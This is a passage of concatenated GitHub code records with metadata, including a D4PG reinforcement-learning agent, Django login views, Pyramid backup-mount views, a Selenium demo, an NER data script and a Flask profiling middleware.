AlphaTreesPrefs,\n #PreviewMenu,\n]\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n","repo_name":"muhuk/cardmate","sub_path":"cardmate/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26980919655","text":"import sys\nfrom io import StringIO\nfrom lxml.html import HtmlElement\nimport lxml.html as lh\n#import lxml.html.clean as lhclean\nsys.path.append(\"..\")\n\nfrom DeceptionFeatureExtractor import DeceptionFeatureExtractor as dfe\n\nclass InitialFeatureExtractor(dfe): #HTML and Deception\n def __init__(self, documentName=\"currentWebsite\", indicators=[]):\n dfe.__init__(self, documentName, indicators)\n\n def numOfTagsInString(self, textString):\n maxTagCount = 100 #Unsure of how many HTML tags exist, so not perfect\n return float(len(self.htmlParser.getTagsFromString(textString)))/maxTagCount\n\n def _getHREFAndURLTextPairsInString(self, textString):\n tree = lh.fromstring(textString)\n \n if isinstance(tree, HtmlElement):\n return [(tree.get(\"href\"), tree.text)]\n \n urls = tree.xpath(\"//a/@href\")\n textStrings = tree.xpath(\"//a/@href/text()\")\n \n return zip(urls, textStrings)\n\n def proportionOfNonMatchingHRefPairs(self, textString):\n pairs = self._getHREFAndURLTextPairsInString(textString)\n if len(pairs) == 1 and (pairs[0][0] == None\\\n and pairs[0][1] == None): #List/tuple is empty\n return 0\n return float(sum([0 if pair[0] == pair[1] else 1\\\n for pair in pairs]))/len(pairs)\n\n \n \n \n\n","repo_name":"tomer-senexx/fyp","sub_path":"set/code/Python/MainProgram/Extractors/InitialFeatureExtractor.py","file_name":"InitialFeatureExtractor.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32951689392","text":"import os\nfrom typing import List, Optional\n\nimport yarl\n\nPROFILING_VIEW = \"👤 Profiling\"\nOPTIMIZATION_VIEW = \"📈 Optimization\"\nSCORING_VIEW = \"💯 Scoring\"\n\n\ndef build_dashboard_link(\n dataset_uri: str, view: str, instances: Optional[List[str]] = None\n) -> str:\n \"\"\"Dashboard link with filters for a specif dataset and target instances.\"\"\"\n base_url = yarl.URL(os.environ.get(\"DASHBOARD_URL\", \"http://localhost:8501\"))\n query_url = (\n base_url\n % {\"dataset_uri\": dataset_uri, \"view\": view}\n % ({\"instances\": instances} if instances else {})\n )\n return str(query_url)\n","repo_name":"rafaelleinio/thoth","sub_path":"thoth/util/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"24875370727","text":"from pyramid.exceptions import NotFound\nfrom pyramid.renderers import get_renderer\nfrom pyramid.view import view_config\n\nfrom aamm import Manager\nimport config\n\nclass AAMMViews(object):\n def __init__(self, request):\n self.request = request\n renderer = get_renderer(\"templates/layout.pt\")\n self.layout = renderer.implementation().macros['layout']\n self.aamm = Manager(config.server, config.port,\n config.username, config.password, config.tz_offset)\n\n @view_config(route_name='home', renderer='templates/index.pt')\n def home(self):\n return dict(title='Protected Machines')\n\n @view_config(route_name='machine_view', renderer='templates/machine_view.pt')\n def machine_view(self):\n machine = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n try:\n return dict(title=machine_name, machine=machine)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='mount_do', renderer='templates/mount_do.pt')\n def mount_do(self):\n machine_id = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n recovery_point_id = self.request.matchdict['point_id']\n volume_ids = self.request.matchdict['volume_ids'].split(' ')\n try:\n point = self.aamm.mount_recovery_point(recovery_point_id,\n machine_id,\n machine_name,\n volume_ids)\n\n if point and 'is already being used' in point:\n return dict(title=machine_name, machine=machine_id, task_id=None,\n error='Error: this path is already mounted.')\n elif 'serverError' in point:\n return dict(title=machine_name, machine=machine_id, task_id=None,\n error=point)\n return dict(title=machine_name, task_id=str(point),\n machine=machine_id, error=None)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='dismount_do', renderer='templates/dismount_do.pt')\n def dismount_do(self):\n machine_id = self.request.matchdict['machine']\n machine_name = self.request.matchdict['machine_name']\n try:\n point = self.aamm.dismount_recovery_points(machine_id)\n return dict(title=machine_name, recovery_point=point)\n except KeyError:\n raise NotFound\n\n # API\n\n @view_config(route_name='api', renderer='prettyjson')\n def api(self):\n try:\n return self.aamm.get_machines(self.request)\n except KeyError:\n raise NotFound\n\n @view_config(route_name='machine_api', renderer='prettyjson')\n def machine_api(self):\n machine = self.request.matchdict['machine']\n try:\n _, recovery_points = self.aamm.get_recovery_points(machine,\n self.request)\n return recovery_points\n except KeyError:\n raise NotFound\n\n @view_config(route_name='task_api', renderer='prettyjson')\n def task_api(self):\n task_id = self.request.matchdict['task_id']\n return self.aamm.get_progress(task_id)\n\ndef notfound(request):\n request.response.status = 404\n return dict(title='No Such Machine')\n","repo_name":"rshipp/appassure-mount-manager","sub_path":"aamm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"38317214649","text":"class Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n if(len(t) == 0): \n return False if(len(s) != 0) else True\n l = 0 \n r = 0\n while l < len(s) and r < len(t):\n if s[l] == t[r]:\n l += 1 \n r += 1\n if l < len(s) and s[l] == t[r-1]:\n l += 1 \n if(l == len(s)):\n return True\n return False","repo_name":"HarshOza36/LeetCode_Problems","sub_path":"String/P392 - isSubsequence.py","file_name":"P392 - isSubsequence.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"7147574018","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 17 15:13:32 2019\n\n@author: Isaac\n\"\"\"\n\nfrom Functions.yes_no_check import yes_no_check\nfrom Classes.Project import Project\n\ndef new_project():\n \n name = input('Creating new project, enter project name: ')\n \n root = 'https://noc.com.sg/foodking/'\n print(f'Current rooturl: {root}')\n \n if yes_no_check('Change rooturl?'):\n root = get_valid_root()\n print(f'Rooturl changes to {root}')\n \n project = Project(name, root)\n project.add_prescraped(root)\n \n return project\n\ndef get_valid_root():\n \n import re\n valid = re.compile(\"\\w+\\.\\w+\")\n \n valid_root = False\n while not valid_root:\n root = input('Enter new rooturl: ')\n if valid.search(root):\n root = format_url(root)\n valid_root = True\n else:\n print(f'{root} is an invalid rooturl')\n \n return root\n\ndef format_url(url):\n \n if not url.startswith('http'):\n url = 'http://' + url\n if not url.endswith('/'):\n url = url + '/'\n \n return url","repo_name":"isaacngcs/Data-Scraping","sub_path":"Functions/new_project.py","file_name":"new_project.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36492638610","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 7 13:20:12 2022\n\n@author: Januario Cipriano\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\a248433\\\\Documents\\\\drivers\\\\chromedriver.exe\")\ndriver.get('http://www.python.org')\nassert \"Python\" in driver.title\n\nelem = driver.find_element(By.NAME, 'q')\nelem.clear()\nelem.send_keys('pycon')\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Januario95/RealPython","sub_path":"selenium_practice_2.py","file_name":"selenium_practice_2.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31886895983","text":"\"\"\"\nAuthor: David Valencia\nDate: 12/ 04 /2022\nCompleted :\n\nDescriber:\n Distributed Distributional Deterministic Policy Gradients (D4PG)\n\n A D4PG algorithm attempts to improve the accuracy of a\n DDPG algorithm by incorporating a distributional approach and N-step return\n\n Need:\n Python 3\n Pytorch\n Gym Env --> Pendulum-v1\n\n Important points:\n - Continuous action space only\n - Action Space --> representing the torque, Number of action: one action\n - Observation Space --> representing the x-y coordinates of the pendulum's end and its angular velocity\n - Reward --> *r = -(theta2 + 0.1 * theta_dt2 + 0.001 * torque2)*\n - The episode automatically terminates at 200 time steps.\n\n - D4PG uses simple random noise from normal distribution to encourage action exploration instead of OU noise\n - D4PG can use K agent running in parallet (However, here I use only 1 agent)\n - Actor and critic NN are update vary different wrt DDPG, here distribution to distributions updates\n\n\"\"\"\n\nimport sys\nimport gym\nimport random\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\n\nclass Critic(nn.Module):\n def __init__(self, input_size, hidden_size, num_atoms):\n super(Critic, self).__init__()\n\n self.h_linear_1 = nn.Linear(in_features=input_size, out_features=256)\n self.h_linear_2 = nn.Linear(in_features=256, out_features=128)\n self.h_linear_3 = nn.Linear(in_features=128, out_features=num_atoms)\n\n def forward(self, state, action):\n x = torch.cat([state, action], dim=1) # Concatenates the seq tensors in the given dimension\n x = torch.relu(self.h_linear_1(x))\n x = torch.relu(self.h_linear_2(x))\n x = self.h_linear_3(x) # No activation function here\n x = F.softmax(x, dim=1) # softmax because critic should output probabilities\n return x\n\n\nclass Actor(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Actor, self).__init__()\n\n self.h_linear_1 = nn.Linear(input_size, 256)\n self.h_linear_2 = nn.Linear(256, 128)\n self.h_linear_3 = nn.Linear(128, output_size)\n\n def forward(self, state):\n x = torch.relu(self.h_linear_1(state))\n x = torch.relu(self.h_linear_2(x))\n x = torch.tanh(self.h_linear_3(x))\n return x\n\n\nclass NoiseGenerator:\n def __init__(self, action_dims, action_bound_high, noise_scale=0.3):\n\n self.action_dims = action_dims\n self.action_bounds = action_bound_high\n self.noise_scale = noise_scale\n\n def noise_gen(self):\n noise = np.random.normal(size=self.action_dims) * self.action_bounds * self.noise_scale\n return noise\n\n\nclass Memory:\n def __init__(self, replay_max_size):\n self.replay_max_size = replay_max_size\n self.replay_buffer = deque(maxlen=replay_max_size) # batch of experiences to sample during training\n\n def replay_buffer_add(self, state, action, reward, next_state, done):\n #experience = (state, action, np.array([reward]), next_state, done)\n experience = (state, action, reward, next_state, done)\n self.replay_buffer.append(experience)\n\n def sample_experience(self, batch_size):\n state_batch = []\n action_batch = []\n reward_batch = []\n next_state_batch = []\n done_batch = []\n\n batch = random.sample(self.replay_buffer, batch_size)\n\n for experience in batch:\n state, action, reward, next_state, done = experience\n state_batch.append(state)\n action_batch.append(action)\n reward_batch.append(reward)\n next_state_batch.append(next_state)\n done_batch.append(done)\n\n return state_batch, action_batch, reward_batch, next_state_batch, done_batch\n\n def __len__(self):\n return len(self.replay_buffer)\n\n\nclass PerMemory(object):\n # stored as ( state, action, reward, next_state ) in SumTree\n PER_e = 0.01\n PER_a = 0.6\n PER_b = 0.4\n\n PER_b_increment_per_sampling = 0.001\n absolute_error_upper = 1. # clipped abs error\n\n def __init__(self, capacity):\n # Making the tree\n self.tree = SumTree(capacity)\n\n def per_add(self, state, action, reward, next_state, done):\n #experience = state, action, np.array([reward]), next_state, done\n experience = state, action, (reward), next_state, done\n self.store(experience)\n\n def store(self, experience):\n # Find the max priority\n max_priority = np.max(self.tree.tree[-self.tree.capacity:])\n\n # If the max priority = 0 we can't put priority = 0 since this experience\n # will never have a chance to be selected, so we use a minimum priority\n if max_priority == 0:\n max_priority = self.absolute_error_upper\n\n self.tree.add(max_priority, experience) # set the max priority for new priority\n\n def sample_experience(self, n):\n # Create a minibatch array that will contain the minibatch of experiences\n minibatch = []\n b_idx = np.empty((n,), dtype=np.int32)\n # Calculate the priority segment\n # Here, as explained in the paper, we divide the Range[0, ptotal] into n ranges\n priority_segment = self.tree.total_priority / n # priority segment\n\n for i in range(n):\n # A value is uniformly sample from each range\n a, b = priority_segment * i, priority_segment * (i + 1)\n value = np.random.uniform(a, b)\n # Experience that correspond to each value is retrieved\n index, priority, data = self.tree.get_leaf(value)\n b_idx[i] = index\n minibatch.append([data[0], data[1], data[2], data[3], data[4]])\n\n return b_idx, minibatch\n\n def batch_update(self, tree_idx, abs_errors):\n abs_errors += self.PER_e # convert to abs and avoid 0\n clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)\n ps = np.power(clipped_errors, self.PER_a)\n\n for ti, p in zip(tree_idx, ps):\n self.tree.update(ti, p)\n\n\nclass SumTree(object):\n data_pointer = 0\n\n # Here we initialize the tree with all nodes = 0, and initialize the data with all values = 0\n def __init__(self, capacity):\n # Number of leaf nodes (final nodes) that contains experiences\n self.capacity = capacity\n\n # Generate the tree with all nodes values = 0\n # To understand this calculation (2 * capacity - 1)\n # Remember we are in a binary node (each node has max 2 children) so 2x size of leaf (capacity) - 1 (root node)\n # Parent nodes = capacity - 1\n # Leaf nodes = capacity\n self.tree = np.zeros(2 * capacity - 1)\n # Contains the experiences (so the size of data is capacity)\n self.data = np.zeros(capacity, dtype=object)\n\n def add(self, priority, data):\n # Look at what index we want to put the experience, fill the leaves from left to right\n tree_index = self.data_pointer + self.capacity - 1\n # Update data frame\n self.data[self.data_pointer] = data\n # Update the leaf\n self.update(tree_index, priority)\n # Add 1 to data_pointer\n self.data_pointer += 1\n if self.data_pointer >= self.capacity: # If we're above the capacity, we go back to first index (we overwrite)\n self.data_pointer = 0\n\n def update(self, tree_index, priority):\n # Change = new priority score - former priority score\n change = priority - self.tree[tree_index]\n self.tree[tree_index] = priority\n\n # then propagate the change through tree\n # this method is faster than the recursive loop\n while tree_index != 0:\n tree_index = (tree_index - 1) // 2\n self.tree[tree_index] += change\n\n def get_leaf(self, v):\n parent_index = 0\n while True:\n left_child_index = 2 * parent_index + 1\n right_child_index = left_child_index + 1\n\n # If we reach bottom, end the search\n if left_child_index >= len(self.tree):\n leaf_index = parent_index\n break\n else: # downward search, always search for a higher priority node\n if v <= self.tree[left_child_index]:\n parent_index = left_child_index\n else:\n v -= self.tree[left_child_index]\n parent_index = right_child_index\n\n data_index = leaf_index - self.capacity + 1\n return leaf_index, self.tree[leaf_index], self.data[data_index]\n\n @property\n def total_priority(self):\n return self.tree[0] # Returns the root node\n\n\nclass D4PGAgent:\n\n def __init__(self, env, actor_learning_rate=1e-4, critic_learning_rate=1e-4, gamma=0.99,\n max_memory_size=50000, tau=1e-3, n_steps=1):\n\n # -------- Parameters --------------- #\n self.num_states = env.observation_space.shape[0] # 3\n self.num_actions = env.action_space.shape[0] # 1\n\n self.act_max_bound = env.action_space.high # [2.]\n self.act_min_bound = env.action_space.low # [-2.]\n\n # these parameters are used for the probability distribution\n self.n_atoms = 51\n self.v_min = -10\n self.v_max = 10\n self.delta = (self.v_max - self.v_min) / (self.n_atoms - 1)\n self.v_lin = torch.linspace(self.v_min, self.v_max, self.n_atoms).view(-1, 1)\n\n self.gamma = gamma # discount factor\n self.tau = tau\n self.n_steps = n_steps\n self.t_step = 0 # counter for activating learning every few steps\n\n # ---------- Initialization and build the networks ----------- #\n hidden_size = 256 # todo try different size for each hidden layer\n self.actor = Actor(self.num_states, hidden_size, self.num_actions) # main Actor network Actor\n self.critic = Critic(self.num_states + self.num_actions, hidden_size, self.n_atoms) # main Critic network\n\n self.actor_target = Actor(self.num_states, hidden_size, self.num_actions)\n self.critic_target = Critic(self.num_states + self.num_actions, hidden_size, self.n_atoms)\n\n # Initialization of the target networks as copies of the original networks\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data)\n\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data)\n\n # optimizers\n # todo check with different lr values\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=actor_learning_rate)\n self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=critic_learning_rate)\n\n # ----------- Gaussian Noise Generator -------------- #\n self.noise = NoiseGenerator(self.num_actions, self.act_max_bound)\n\n # ------------- Initialization memory --------------------- #\n self.memory = Memory(max_memory_size)\n\n per_max_memory_size = 10000\n self.memory_per = PerMemory(per_max_memory_size)\n\n def get_action(self, state):\n state_tensor = torch.from_numpy(state).float().unsqueeze(0) # numpy to a tensor with shape [1,3]\n\n self.actor.eval()\n with torch.no_grad():\n action = self.actor(state_tensor)\n action = action.detach()\n action = action.numpy()\n noise = np.random.normal(size=action.shape)\n action = np.clip(action + noise, -1, 1) # todo maybe I could change this to -2, 2?\n self.actor.train()\n return action[0]\n\n def distr_projection(self, next_distribution, rewards, dones):\n next_distr = next_distribution.data.cpu().numpy()\n rewards = rewards.data.cpu().numpy()\n dones_mask = dones.cpu().numpy().astype(bool)\n batch_size = len(rewards)\n proj_distr = np.zeros((batch_size, self.n_atoms), dtype=np.float32)\n gamma = self.gamma ** self.n_steps\n\n for atom in range(self.n_atoms):\n tz_j = np.minimum(self.v_max, np.maximum(self.v_min, rewards + (self.v_min + atom * self.delta) * gamma))\n b_j = (tz_j - self.v_min) / self.delta\n l = np.floor(b_j).astype(np.int64)\n u = np.ceil(b_j).astype(np.int64)\n eq_mask = u == l\n proj_distr[eq_mask, l[eq_mask]] += next_distr[eq_mask, atom]\n ne_mask = u != l\n proj_distr[ne_mask, l[ne_mask]] += next_distr[ne_mask, atom] * (u - b_j)[ne_mask]\n proj_distr[ne_mask, u[ne_mask]] += next_distr[ne_mask, atom] * (b_j - l)[ne_mask]\n\n if dones_mask.any():\n proj_distr[dones_mask] = 0.0\n tz_j = np.minimum(self.v_max, np.maximum(self.v_min, rewards[dones_mask]))\n b_j = (tz_j - self.v_min) / self.delta\n l = np.floor(b_j).astype(np.int64)\n u = np.ceil(b_j).astype(np.int64)\n eq_mask = u == l\n eq_dones = dones_mask.copy()\n eq_dones[dones_mask] = eq_mask\n if eq_dones.any():\n proj_distr[eq_dones, l[eq_mask]] = 1.0\n ne_mask = u != l\n ne_dones = dones_mask.copy()\n ne_dones[dones_mask] = ne_mask\n if ne_dones.any():\n proj_distr[ne_dones, l[ne_mask]] = (u - b_j)[ne_mask]\n proj_distr[ne_dones, u[ne_mask]] = (b_j - l)[ne_mask]\n\n return torch.FloatTensor(proj_distr)\n\n def step_training(self, state, action, reward, next_state, done, batch_size, per_memory_status):\n\n # Save experience in memory\n if per_memory_status:\n self.memory_per.per_add(state, action, reward, next_state, done)\n else:\n self.memory.replay_buffer_add(state, action, reward, next_state, done)\n\n LEARN_EVERY_STEP = 100\n self.t_step = self.t_step + 1\n\n if self.t_step % LEARN_EVERY_STEP == 0:\n self.learn_step(batch_size, per_memory_status)\n\n def learn_step(self, batch_size, per_memory_status):\n if per_memory_status:\n tree_idx, minibatch = self.memory_per.sample_experience(batch_size)\n states = np.zeros((batch_size, self.num_states))\n next_states = np.zeros((batch_size, self.num_states))\n actions, rewards, dones = [], [], []\n for i in range(batch_size):\n states[i] = minibatch[i][0]\n actions.append(minibatch[i][1])\n rewards.append(minibatch[i][2])\n next_states[i] = minibatch[i][3]\n dones.append(minibatch[i][4])\n else:\n # check, if enough samples are available in memory\n if self.memory.__len__() <= batch_size:\n return\n else:\n states, actions, rewards, next_states, dones = self.memory.sample_experience(batch_size)\n\n states = np.array(states)\n actions = np.array(actions)\n rewards = np.array(rewards)\n dones = np.array(dones)\n next_states = np.array(next_states)\n\n states = torch.FloatTensor(states)\n actions = torch.FloatTensor(actions)\n rewards = torch.FloatTensor(rewards)\n dones = torch.ByteTensor(dones)\n next_states = torch.FloatTensor(next_states)\n\n '''\n # this is from tutorial only\n # remeber here remove the softmax in the last critic's layer\n # ---------------------------- update critic ---------------------------- #\n crt_distr_v = self.critic.forward(states, actions)\n\n last_act_v = self.actor_target.forward(next_states)\n last_distr_v = F.softmax(self.critic_target.forward(next_states, last_act_v), dim=1)\n\n proj_distr_v = self.distr_projection(last_distr_v, rewards, dones)\n prob_dist_v = -F.log_softmax(crt_distr_v, dim=1) * proj_distr_v\n critic_loss_v = prob_dist_v.sum(dim=1).mean()\n\n self.critic_optimizer.zero_grad()\n critic_loss_v.backward()\n self.critic_optimizer.step()\n\n # ---------------------------- update actor ---------------------------- #\n actions_pred = self.actor.forward(states)\n crt_distr_v = self.critic.forward(states, actions_pred)\n\n support_v = torch.arange(self.v_min, self.v_max + self.delta, self.delta)\n weights = F.softmax(crt_distr_v, dim=1) * support_v\n actor_loss_v = weights.sum(dim=1)\n actor_loss_v = - actor_loss_v.unsqueeze(dim=-1) # todo check this line\n actor_loss_v = actor_loss_v.mean()\n\n self.actor_optimizer.zero_grad()\n actor_loss_v.backward()\n self.actor_optimizer.step()\n\n\n # update the target networks using tao \"soft updates\"\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n '''\n # -------------------------------------------------------------------#\n # -------------------------------------------------------------------#\n\n # calculate the next Z distribution Z(s',a') --> Q_next_value\n next_actions = self.actor_target.forward(next_states) # Note this is from actor-target\n next_Z_val = self.critic_target.forward(next_states, next_actions.detach())\n\n # calculate the project target distribution Y --> Q_target\n proj_distr_v = self.distr_projection(next_Z_val, rewards, dones)\n Y = proj_distr_v # target_z_projected\n\n # calculate the distribution prediction Z(s,a) --> Q_values\n Z_val = self.critic.forward(states, actions) # this is a categorical distribution, the Z predicted\n # ----------------------------------- Calculate the loss ----- #\n # ------- calculate the critic loss\n BCE_loss = torch.nn.BCELoss(reduction='none')\n td_error = BCE_loss(Z_val, Y)\n td_error = td_error.mean(axis=1)\n critic_loss = td_error.mean()\n\n # ------- calculate the actor loss\n z_atoms = np.linspace(self.v_min, self.v_max, self.n_atoms)\n z_atoms = torch.from_numpy(z_atoms).float()\n actor_loss = self.critic.forward(states, self.actor.forward(states))\n actor_loss = actor_loss * z_atoms\n actor_loss = torch.sum(actor_loss, dim=1)\n actor_loss = -actor_loss.mean()\n\n # ---------Update priorities for PER\n if per_memory_status:\n td_error = td_error.detach().numpy().flatten()\n absolute_errors = np.abs(td_error)\n self.memory_per.batch_update(tree_idx, absolute_errors)\n\n # ------------------------------------- Update networks ----- #\n # Actor step Update\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Critic step Update\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # update the target networks using tao \"soft updates\"\n for target_param, param in zip(self.actor_target.parameters(), self.actor.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n\n for target_param, param in zip(self.critic_target.parameters(), self.critic.parameters()):\n target_param.data.copy_(param.data * self.tau + target_param.data * (1.0 - self.tau))\n \n\n\ndef main():\n\n EPISODES = 50000 # ---> T, total number of episodes\n batch_size = 64 # ---> M\n rollout_steps = 1 # ---> N, trajectory length\n gamma = 0.99\n # -------------------------------\n env = gym.make('Pendulum-v1')\n agent = D4PGAgent(env, gamma=gamma, n_steps=rollout_steps)\n # -------------------------------\n per_memory_status = False\n # -----------\n rewards = []\n avg_rewards = []\n for episode in range(1, EPISODES + 1):\n state = env.reset()\n done = False\n episode_reward = 0\n\n while not done:\n env.render()\n n_step_reward = 0\n for n in range(rollout_steps):\n action = agent.get_action(state)\n next_state, reward, done, _ = env.step(action)\n n_step_reward += reward * gamma ** n # todo should use gamma here?\n if n == (rollout_steps - 1):\n agent.step_training(state, action, n_step_reward, next_state, done, batch_size, per_memory_status)\n state = next_state\n episode_reward += reward\n\n if done:\n print(episode_reward, episode)\n break\n rewards.append(episode_reward)\n avg_rewards.append(np.mean(rewards[-10:]))\n\n plt.plot(rewards)\n plt.plot(avg_rewards)\n plt.plot()\n plt.xlabel('Episode')\n plt.ylabel('Reward')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"dvalenciar/robotic_arm_environment","sub_path":"RL_algorithms_basic/D4PG.py","file_name":"D4PG.py","file_ext":"py","file_size_in_byte":21453,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"7"} +{"seq_id":"464503048","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login\nfrom ..forms import LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom ..forms import UserRegistrationForm\n\n# TIPS\ndef user_login(request):\n # Пойск выполнено POST\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(\n request=request, \n username=cd['username'], \n password=cd['password']\n )\n # Успех \n if user is not None:\n if user.is_active:\n login(request=request, user=user)\n return HttpResponse('Вы вошли успешно в страницу')\n \n # Не найден\n else:\n return HttpResponse('Аккаунт не найден')\n # неправильный доступ\n else:\n return HttpResponse('неправильный ник или пароль ')\n \n # Поиск как GET\n else:\n form = LoginForm()\n \n context = {\n 'form':form\n }\n\n return render(request=request, template_name='account/login.html', context=context)\n\n@login_required\ndef dashboard(request):\n context = {\n 'section': 'dashboard'\n }\n return render(\n request=request,\n template_name='account/dashboard.html', \n context=context\n )\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Создать новый обьект пользователя, но пока не сохранять его\n new_user = user_form.save(commit=False)\n # Установить выбранный пароль\n new_user.set_password(\n user_form.cleaned_data['password2']\n )\n # Сохранить обьект\n new_user.save()\n\n context = {\n 'new_user':new_user\n }\n\n return render(\n request=request,\n template_name='account/register_done.html',\n context=context\n )\n\n else:\n user_form = UserRegistrationForm()\n\n\n context = {\n 'user_form':user_form\n }\n\n return render(\n request=request,\n template_name='account/register.html',\n context=context\n )","repo_name":"ArturSeytjanov/social_app","sub_path":"account/views/fb_views.py","file_name":"fb_views.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31090933144","text":"import re\nimport random\nimport os\n\nimport numpy as np\nimport pandas as pd\n\ndef seed_everything(seed):\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n np.random.default_rng(seed)\n random.seed(seed)\n\ndef generate_data(data):\n gen_data = []\n answer = []\n\n pattern = r'<.*?:.*?>'\n for row in data:\n items = re.findall(pattern, row)\n\n new_row = row\n for item in items:\n new_row = new_row.replace(item, item.split(\":\")[0].lstrip(\"<\"))\n \n gen_data.append(\"ner: \" + new_row)\n answer.append(\"\".join(items))\n\n return gen_data, answer\n\n\nif __name__ == \"__main__\":\n seed_everything(981029)\n\n with open(\"./data/klue_ner_train_80.t\", \"r\") as f:\n train_data = f.read().splitlines()\n\n with open(\"./data/klue_ner_test_20.t\", \"r\") as f:\n test_data = f.read().splitlines()\n\n df = pd.DataFrame(columns=[\"source\", \"target\"])\n df['source'], df['target'] = generate_data(train_data)\n\n df = df.sample(frac=1).reset_index(drop=True)\n\n split_point = int(len(df) * 0.8)\n\n train_df = df[:split_point]\n val_df = df[split_point:]\n \n test_df = pd.DataFrame(columns=[\"source\", \"target\"])\n test_df['source'], test_df['target'] = generate_data(test_data)\n\n train_df.to_csv(\"train.csv\", index=False)\n val_df.to_csv(\"validation.csv\", index=False)\n test_df.to_csv(\"test.csv\", index=False)\n","repo_name":"kkjsw17/KU-NLP-kt-dev-challenge-2022","sub_path":"data/gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35442989999","text":"from blackfire.utils import get_logger\nfrom blackfire.hooks.wsgi import BlackfireWSGIMiddleware\nfrom blackfire.hooks.utils import add_probe_response_header\n\nlog = get_logger(__name__)\n\n\nclass BlackfireFlaskMiddleware(BlackfireWSGIMiddleware):\n\n FRAMEWORK = 'flask'\n\n def __init__(self, flask_app):\n self.app = flask_app.wsgi_app\n self.flask_app = flask_app\n\n def build_blackfire_yml_response(\n self, blackfireyml_content, agent_response, environ, start_response,\n *args\n ):\n from flask import Response\n\n response = Response()\n if agent_response: # send response if signature is validated\n response.data = blackfireyml_content or ''\n add_probe_response_header(response.headers, agent_response)\n\n return response(environ, start_response)\n\n def get_view_name(self, environ):\n \"\"\"This is a best effort to get the viewname at the start of Wsgi.__call__\n \n In fact, while running in Flask context, it is easy to get this value \n from the Request object via `request.endpoint` but wsgi.__call__ is not \n running in request context.\n \n The only place we run in request context in a standard WSGI middleware is\n the `start_response` callback. But if we check endpoint there and start \n the profiler there, then we might end up losing some code paths: especially\n the middlewares that ran before ours. As a general rule of thumb: we would \n like to start the profiler as early as possible and end as late as possible.\n \"\"\"\n\n def _get_view_name(method, url):\n from werkzeug.routing import RequestRedirect\n from werkzeug.exceptions import MethodNotAllowed, NotFound\n\n adapter = self.flask_app.url_map.bind('dummy')\n try:\n match = adapter.match(url, method=method)\n except RequestRedirect as e:\n # recursively match redirects\n return _get_view_name(e.new_url, method)\n except (MethodNotAllowed, NotFound):\n return None\n\n try:\n r = self.flask_app.view_functions[match[0]]\n return r.__name__\n except KeyError:\n # no view is associated with the endpoint\n return None\n\n try:\n return _get_view_name(\n environ['REQUEST_METHOD'], environ.get('PATH_INFO', 